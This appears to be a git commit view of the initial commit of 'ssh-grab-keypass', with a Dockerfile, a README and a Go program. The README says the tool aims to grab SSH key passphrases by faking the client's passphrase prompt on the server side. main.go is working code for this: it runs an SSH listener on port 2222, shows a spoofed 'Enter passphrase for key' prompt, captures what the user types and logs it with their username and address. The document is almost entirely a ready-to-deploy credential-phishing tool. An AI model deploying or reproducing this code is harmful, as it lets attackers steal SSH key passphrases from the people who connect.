diff options
author | maride <maride@darknebu.la> | 2019-02-12 14:40:46 +0100 |
---|---|---|
committer | maride <maride@darknebu.la> | 2019-02-12 14:40:46 +0100 |
commit | 34e0f86d7eea9ed9cb891d20d0de63ce7e79dc0a (patch) | |
tree | cd682c605fc4f532d5c775ec2baf966620370632 |
Init
-rw-r--r-- | Dockerfile | 19 | ||||
-rw-r--r-- | README.md | 7 | ||||
-rw-r--r-- | main.go | 50 |
3 files changed, 76 insertions, 0 deletions
diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..cdb8930 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,19 @@ +FROM golang:1.10-alpine + +# Setup +COPY main.go . + +# Install libs +RUN apk add git +RUN go get github.com/gliderlabs/ssh + +# Build +RUN go build -o ssh-grab-keypass + +# Drop privs +RUN adduser -u 1337 -D jail +RUN chmod 000 /home/jail + +EXPOSE 2222 + +CMD su -c ./ssh-grab-keypass jail diff --git a/README.md b/README.md new file mode 100644 index 0000000..2afed8a --- /dev/null +++ b/README.md @@ -0,0 +1,7 @@ +# ssh-grab-keypass + +Try to grab passphrases for SSH keyfiles by simulating the pubkey-prompt by the client - on the server side. + +## Usage + +Simply run it. The executable takes no command line arguments diff --git a/main.go b/main.go new file mode 100644 index 0000000..b2b2ae4 --- /dev/null +++ b/main.go @@ -0,0 +1,50 @@ +package main + +import ( + "fmt" + "github.com/gliderlabs/ssh" + "log" + "strings" +) + +func main() { + ssh.Handle(handleConnection) + listenErr := ssh.ListenAndServe(":2222", nil) + + if listenErr != nil { + log.Fatalln(listenErr.Error()) + } +} + +func handleConnection(s ssh.Session) { + // Set up buffer + buf := make([]byte, 1) + + // Send our message + fmt.Fprintf(s, "Enter passphrase for key '/home/%s/.ssh/id_rsa': ", s.User()) + + // Read id_rsa password of our client ;) + var readErr error + strBuf := "" + + for readErr == nil && !strings.Contains(strBuf, "\x0D") { + _, readErr = s.Read(buf) + + if string(buf[0]) != "\x0D" { + strBuf += string(buf[0]) + } else { + break + } + } + + if readErr == nil { + // Print out pass + log.Printf("%s@%s: '%s'", s.User(), s.RemoteAddr().String(), strBuf) + } else { + // Read error - just log that. + log.Println(readErr.Error()) + } + + // And close it. + s.Exit(1) +} |